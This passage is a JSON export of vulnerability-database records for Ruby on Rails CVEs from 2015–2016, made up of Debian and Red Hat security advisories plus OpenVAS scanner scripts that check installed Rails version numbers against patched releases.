"bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", 
"availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3227", "CVE-2015-7576"], "modified": "2016-08-27T16:25:23", "id": "DEBIAN:DLA-603-1:FFD85", "href": "https://lists.debian.org/debian-lts-announce/2016/08/msg00027.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2021-10-19T20:38:05", "description": "The ruby193 collection provides Ruby version 1.9.3 and Ruby on Rails\nversion 3.2. Ruby on Rails is a model-view-controller (MVC) framework for\nweb application development.\n\nThe following issues were corrected in rubygem-actionpack:\n\nMultiple directory traversal flaws were found in the way the Action View\ncomponent searched for templates for rendering. If an application passed\nuntrusted input to the 'render' method, a remote, unauthenticated attacker\ncould use these flaws to render unexpected files and, possibly, execute\narbitrary code. (CVE-2016-0752, CVE-2016-2097)\n\nA code injection flaw was found in the way the Action View component\nsearched for templates for rendering. If an application passed untrusted\ninput to the 'render' method, a remote, unauthenticated attacker could use\nthis flaw to execute arbitrary code. (CVE-2016-2098)\n\nA flaw was found in the way the Action Pack component performed MIME type\nlookups. Since queries were cached in a global cache of MIME types, an\nattacker could use this flaw to grow the cache indefinitely, potentially\nresulting in a denial of service. (CVE-2016-0751)\n\nA flaw was found in the way the Action Controller component compared user\nnames and passwords when performing HTTP basic authentication. 
Time taken\nto compare strings could differ depending on input, possibly allowing a\nremote attacker to determine valid user names and passwords using a timing\nattack. (CVE-2015-7576)\n\nThe following issue was corrected in rubygem-activerecord:\n\nA flaw was found in the Active Record component's handling of nested\nattributes in combination with the destroy flag. An attacker could possibly\nuse this flaw to set attributes to invalid values or clear all attributes.\n(CVE-2015-7577)\n\nRed Hat would like to thank the Ruby on Rails project for reporting these\nissues. Upstream acknowledges John Poulin as the original reporter of\nCVE-2016-0752, Jyoti Singh and Tobias Kraze (makandra) as original\nreporters of CVE-2016-2097, Tobias Kraze (makandra) and joernchen\n(Phenoelit) as original reporters of CVE-2016-2098, Aaron Patterson (Red\nHat) as the original reporter of CVE-2016-0751, Daniel Waterworth as the\noriginal reporter of CVE-2015-7576, and Justin Coyne as the original\nreporter of CVE-2015-7577.\n\nAll ruby193 collection rubygem-actionpack and rubygem-activerecord packages\nusers are advised to upgrade to these updated packages, which contain\nbackported patches to correct these issues. 
All running applications using\nthe ruby193 collection must be restarted for this update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-03-15T00:00:00", "type": "redhat", "title": "(RHSA-2016:0455) Important: ruby193 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098"], "modified": "2018-06-12T21:28:20", "id": "RHSA-2016:0455", "href": "https://access.redhat.com/errata/RHSA-2016:0455", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:39:46", "description": "The ror40 collection provides Ruby on Rails version 4.0. Ruby on Rails is\na model-view-controller (MVC) framework for web application development.\n\nThe following issues were corrected in rubygem-actionpack:\n\nMultiple directory traversal flaws were found in the way the Action View\ncomponent searched for templates for rendering. If an application passed\nuntrusted input to the 'render' method, a remote, unauthenticated attacker\ncould use these flaws to render unexpected files and, possibly, execute\narbitrary code. 
(CVE-2016-0752, CVE-2016-2097)\n\nA code injection flaw was found in the way the Action View component\nsearched for templates for rendering. If an application passed untrusted\ninput to the 'render' method, a remote, unauthenticated attacker could use\nthis flaw to execute arbitrary code. (CVE-2016-2098)\n\nA flaw was found in the way the Action Pack component performed MIME type\nlookups. Since queries were cached in a global cache of MIME types, an\nattacker could use this flaw to grow the cache indefinitely, potentially\nresulting in a denial of service. (CVE-2016-0751)\n\nA flaw was found in the Action Pack component's caching of controller\nreferences. An attacker could use this flaw to cause unbounded memory\ngrowth, potentially resulting in a denial of service. (CVE-2015-7581)\n\nA flaw was found in the way the Action Controller component compared user\nnames and passwords when performing HTTP basic authentication. Time taken\nto compare strings could differ depending on input, possibly allowing a\nremote attacker to determine valid user names and passwords using a timing\nattack. (CVE-2015-7576)\n\nThe following issue was corrected in rubygem-activerecord:\n\nA flaw was found in the Active Record component's handling of nested\nattributes in combination with the destroy flag. An attacker could possibly\nuse this flaw to set attributes to invalid values or clear all attributes.\n(CVE-2015-7577)\n\nRed Hat would like to thank the Ruby on Rails project for reporting these\nissues. 
Upstream acknowledges John Poulin as the original reporter of\nCVE-2016-0752, Jyoti Singh and Tobias Kraze (makandra) as original\nreporters of CVE-2016-2097, Tobias Kraze (makandra) and joernchen\n(Phenoelit) as original reporters of CVE-2016-2098, Aaron Patterson (Red\nHat) as the original reporter of CVE-2016-0751, Daniel Waterworth as the\noriginal reporter of CVE-2015-7576, and Justin Coyne as the original\nreporter of CVE-2015-7577.\n\nAll ror40 collection rubygem-actionpack and rubygem-activerecord packages\nusers are advised to upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running applications using\nthe ror40 collection must be restarted for this update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-03-15T00:00:00", "type": "redhat", "title": "(RHSA-2016:0454) Important: ror40 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098"], "modified": "2018-06-12T21:28:18", "id": "RHSA-2016:0454", "href": "https://access.redhat.com/errata/RHSA-2016:0454", 
"cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:39:56", "description": "The rh-ror41 collection provides Ruby on Rails version 4.1. Ruby on Rails\nis a model-view-controller (MVC) framework for web application development.\n\nThe following issues were corrected in rubygem-actionview:\n\nA directory traversal flaw was found in the way the Action View component\nsearched for templates for rendering. If an application passed untrusted\ninput to the 'render' method, a remote, unauthenticated attacker could use\nthis flaw to render unexpected files and, possibly, execute arbitrary code.\n(CVE-2016-2097)\n\nA code injection flaw was found in the way the Action View component\nsearched for templates for rendering. If an application passed untrusted\ninput to the 'render' method, a remote, unauthenticated attacker could use\nthis flaw to execute arbitrary code. (CVE-2016-2098)\n\nRed Hat would like to thank the Ruby on Rails project for reporting these\nissues. Upstream acknowledges Jyoti Singh and Tobias Kraze (makandra) as\noriginal reporters of CVE-2016-2097, and Tobias Kraze (makandra) and\njoernchen (Phenoelit) as original reporters of CVE-2016-2098.\n\nAll rh-ror41 collection rubygem-actionview packages users are advised to\nupgrade to these updated packages, which contain backported patches to\ncorrect these issues. 
All running applications using the rh-ror41\ncollection must be restarted for this update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-03-15T00:00:00", "type": "redhat", "title": "(RHSA-2016:0456) Important: rh-ror41 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2097", "CVE-2016-2098"], "modified": "2018-06-12T21:28:26", "id": "RHSA-2016:0456", "href": "https://access.redhat.com/errata/RHSA-2016:0456", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:37:58", "description": "The rh-ror41 collection provides Ruby on Rails version 4.1. Ruby on Rails\nis a model-view-controller (MVC) framework for web application development.\n\nThe following issue was corrected in rubygem-actionpack and\nrubygem-actionview:\n\nA directory traversal flaw was found in the way the Action View component\nsearched for templates for rendering. 
If an application passed untrusted\ninput to the 'render' method, a remote, unauthenticated attacker could use\nthis to render unexpected files and, possibly, execute arbitrary code.\n(CVE-2016-0752)\n\nThe following issues were corrected in rubygem-actionpack:\n\nA flaw was found in the way the Action Pack component performed MIME type\nlookups. Since queries were cached in a global cache of MIME types, an\nattacker could use this flaw to grow the cache indefinitely, potentially\nresulting in a denial of service. (CVE-2016-0751)\n\nA flaw was found in the Action Pack component's caching of controller\nreferences. An attacker could use this flaw to cause unbounded memory\ngrowth, potentially resulting in a denial of service. (CVE-2015-7581)\n\nA flaw was found in the way the Action Controller component compared user\nnames and passwords when performing HTTP basic authentication. Time taken\nto compare strings could differ depending on input, possibly allowing a\nremote attacker to determine valid user names and passwords using a timing\nattack. (CVE-2015-7576)\n\nThe following issue was corrected in rubygem-activerecord:\n\nA flaw was found in the Active Record component's handling of nested\nattributes in combination with the destroy flag. An attacker could possibly\nuse this flaw to set attributes to invalid values or clear all attributes.\n(CVE-2015-7577)\n\nThe following issue was corrected in rubygem-activemodel and\nrubygem-activerecord:\n\nA flaw was found in the way the Active Model based models processed\nattributes. An attacker with the ability to pass arbitrary attributes to\nmodels could possibly use this flaw to bypass input validation.\n(CVE-2016-0753)\n\nRed Hat would like to thank the Ruby on Rails project for reporting these\nissues. 
Upstream acknowledges John Poulin as the original reporter of\nCVE-2016-0752, Aaron Patterson of Red Hat as the original reporter of\nCVE-2016-0751, Daniel Waterworth as the original reporter of CVE-2015-7576,\nJustin Coyne as the original reporter of CVE-2015-7577, and John Backus\nfrom BlockScore as the original reporter of CVE-2016-0753.\n\nAll rh-ror41 collection rubygem-actionpack, rubygem-actionview,\nrubygem-activemodel, and rubygem-activerecord packages users are advised to\nupgrade to these updated packages, which contain backported patches to\ncorrect these issues. All running applications using the rh-ror41\ncollection must be restarted for this update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-02-24T00:00:00", "type": "redhat", "title": "(RHSA-2016:0296) Important: rh-ror41 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2018-06-12T21:28:22", "id": "RHSA-2016:0296", "href": "https://access.redhat.com/errata/RHSA-2016:0296", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, 
{"lastseen": "2021-10-19T20:35:42", "description": "Ruby on Rails is a model-view-controller (MVC) framework for web application development. Action Pack implements the controller and the view components.\n\nSecurity Fix(es):\n\n* It was discovered that Action View tag helpers did not escape quotes when using strings declared as HTML safe as attribute values. A remote attacker could use this flaw to conduct a cross-site scripting (XSS) attack. (CVE-2016-6316)\n\nRed Hat would like to thank the Ruby on Rails project for reporting this issue. Upstream acknowledges Andrew Carpenter (Critical Juncture) as the original reporter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-09-13T09:51:16", "type": "redhat", "title": "(RHSA-2016:1857) Moderate: ror40-rubygem-actionpack security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2018-06-12T21:28:24", "id": "RHSA-2016:1857", "href": "https://access.redhat.com/errata/RHSA-2016:1857", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-10-19T20:37:53", "description": "Ruby on Rails is a model-view-controller (MVC) 
framework for web application development. Action Pack implements the controller and the view components.\n\nSecurity Fix(es):\n\n* It was discovered that Action View tag helpers did not escape quotes when using strings declared as HTML safe as attribute values. A remote attacker could use this flaw to conduct a cross-site scripting (XSS) attack. (CVE-2016-6316)\n\nRed Hat would like to thank the Ruby on Rails project for reporting this issue. Upstream acknowledges Andrew Carpenter (Critical Juncture) as the original reporter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-09-13T09:51:35", "type": "redhat", "title": "(RHSA-2016:1858) Moderate: ruby193-rubygem-actionpack security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2018-06-12T21:28:26", "id": "RHSA-2016:1858", "href": "https://access.redhat.com/errata/RHSA-2016:1858", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-10-19T20:36:26", "description": "Ruby on Rails is a model-view-controller (MVC) framework for web application development. 
Action View implements the view component.\n\nSecurity Fix(es):\n\n* It was discovered that Action View tag helpers did not escape quotes when using strings declared as HTML safe as attribute values. A remote attacker could use this flaw to conduct a cross-site scripting (XSS) attack. (CVE-2016-6316)\n\nRed Hat would like to thank the Ruby on Rails project for reporting this issue. Upstream acknowledges Andrew Carpenter (Critical Juncture) as the original reporter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-09-13T09:50:58", "type": "redhat", "title": "(RHSA-2016:1856) Moderate: rh-ror41-rubygem-actionview security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2018-06-12T21:28:18", "id": "RHSA-2016:1856", "href": "https://access.redhat.com/errata/RHSA-2016:1856", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-10-21T04:46:32", "description": "Ruby on Rails is a model-view-controller (MVC) framework for web application development. 
Action View implements the view component, and Active Record implements the model component.\n\nSecurity Fix(es) in rubygem-actionview:\n\n* It was discovered that Action View tag helpers did not escape quotes when using strings declared as HTML safe as attribute values. A remote attacker could use this flaw to conduct a cross-site scripting (XSS) attack. (CVE-2016-6316)\n\nSecurity Fix(es) in rubygem-activerecord:\n\n* A flaw was found in the way Active Record handled certain special values in dynamic finders and relations. If a Ruby on Rails application performed JSON parameter parsing, a remote attacker could possibly manipulate search conditions in SQL queries generated by the application. (CVE-2016-6317)\n\nRed Hat would like to thank the Ruby on Rails project for reporting these issues. Upstream acknowledges Andrew Carpenter (Critical Juncture) as the original reporter of CVE-2016-6316; and joernchen (Phenoelit) as the original reporter of CVE-2016-6317.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-09-13T09:49:49", "type": "redhat", "title": "(RHSA-2016:1855) Moderate: rh-ror42 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2018-04-23T07:41:48", "id": "RHSA-2016:1855", "href": "https://access.redhat.com/errata/RHSA-2016:1855", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2020-07-21T21:52:48", "description": "This host is running Ruby on Rails and is\n prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-10-17T00:00:00", "type": "openvas", "title": "Ruby on Rails Multiple Vulnerabilities-01 Oct16 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7576", "CVE-2016-0751", "CVE-2016-0752"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310809356", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809356", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Multiple Vulnerabilities-01 Oct16 (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809356\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-0752\", \"CVE-2016-0751\", \"CVE-2015-7576\");\n script_bugtraq_id(81801, 81800, 81803);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-17 18:48:40 +0530 (Mon, 17 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Ruby on Rails Multiple Vulnerabilities-01 Oct16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to\n\n - Directory traversal vulnerability in Action View.\n\n - The script 'actionpack/lib/action_dispatch/http/mime_type.rb' does not properly\n restrict use of the MIME type cache.\n\n - The http_basic_authenticate_with method in\n 'actionpack/lib/action_controller/metal/http_authentication.rb' does not use a\n constant-time algorithm for verifying credentials.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to read arbitrary files by leveraging an application's unrestricted use\n of the render method, to cause a denial of service.\");\n\n 
script_tag(name:\"affected\", value:\"Ruby on Rails before 3.2.22.1,\n Ruby on Rails 4.0.x and 4.1.x before 4.1.14.1 and\n Ruby on Rails 4.2.x before 4.2.5.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.1 or 4.1.14.1 or\n 4.2.5.1, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/01/25/10\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version_is_less( version: version, test_version: \"3.2.22.1\" ) )\n{\n fix = \"3.2.22.1\";\n VULN = TRUE;\n}\n\nelse if( version =~ \"^(4\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"4.1.14.1\" ) )\n {\n fix = \"4.1.14.1\";\n VULN = TRUE;\n }\n}\n\nif( version =~ \"^(4\\.2)\" )\n{\n if( version_is_less( version: version, test_version: \"4.2.5.1\" ) )\n {\n fix = \"4.2.5.1\";\n VULN = TRUE;\n }\n}\n\nif( VULN )\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data:report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-07-21T21:55:49", "description": "This host is running Ruby on Rails and is\n prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-10-17T00:00:00", "type": "openvas", "title": "Ruby 
on Rails Multiple Vulnerabilities-01 Oct16 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7576", "CVE-2016-0751", "CVE-2016-0752"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310809357", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809357", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Multiple Vulnerabilities-01 Oct16 (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809357\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-0752\", \"CVE-2016-0751\", \"CVE-2015-7576\");\n script_bugtraq_id(81801, 81800, 81803);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-17 18:48:40 +0530 (Mon, 17 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Ruby on Rails Multiple Vulnerabilities-01 Oct16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - The directory traversal vulnerability in Action View.\n\n - The script 'actionpack/lib/action_dispatch/http/mime_type.rb' does not properly\n restrict use of the MIME type cache.\n\n - The http_basic_authenticate_with method in\n 'actionpack/lib/action_controller/metal/http_authentication.rb' does not use a\n constant-time algorithm for verifying credentials.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to read arbitrary files by leveraging an application's unrestricted use\n of the render method, to cause a denial of service.\");\n\n 
